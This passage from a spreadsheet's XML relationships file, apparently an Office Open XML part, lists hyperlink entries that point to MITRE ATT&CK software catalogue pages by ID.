Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0179" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0242" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0594" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0514" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0006" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0089" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0193" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0371" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0428" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0166" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0589" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0115" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0588" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0201" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0599" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0263" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0284" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0117" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0099" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0024" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0279" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0253" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0023" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0021" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0246" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0372" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0142" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0210" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0116" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0471" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0127" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0396" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0402" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0495" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0335" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0076" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0218" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0170" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0409" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0476" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0101" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0598" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0364" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0475" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0369" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0277" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0370" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0331" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0434" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0133" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0468" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0096" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0059" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0590" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0196" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0518" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0111" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0521" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0538" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0064" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0125" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0477" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0528" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0250" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0467" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0388" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0056" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0438" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0137" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0029" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0085" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0281" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0401" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0061" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0582" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0157" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0275" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0167" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0190" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0261" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0346" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0496" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0171" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0394" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0345" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0280" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0180" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0283" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0337" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0158" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0172" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0225" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0244" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0134" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0026" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0259" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0379" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0586" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0504" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0236" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0273" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0005" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0034" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0208" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0378" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0252" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0255" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0377" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0237" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0195" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0271" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0595" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0251" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0129" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0121" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0457" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0147" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0105" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0119" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0361" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0003" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0232" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0390" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0452" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0459" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0439" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0102" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0520" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0144" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0182" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0575" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0601" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0596" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0155" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0265" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0083" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0435" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0176" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0239" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0547" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0139" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0248" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0497" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0168" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0231" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0448" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0543" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0560" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0353" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0482" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0081" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0556" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0027" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0274" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0561" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0156" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0583" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0450" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0183" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0010" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0130" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0344" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0118" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0032" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0181" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0040" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0240" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0562" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0107" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0530" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0065" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0415" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0052" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0366" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0104" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0574" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0143" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0203" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0501" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0019" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0050" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0487" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0546" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0079" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0150" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0131" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0141" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0567" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0460" TargetMode="External"/><Relationship Id="rId312" 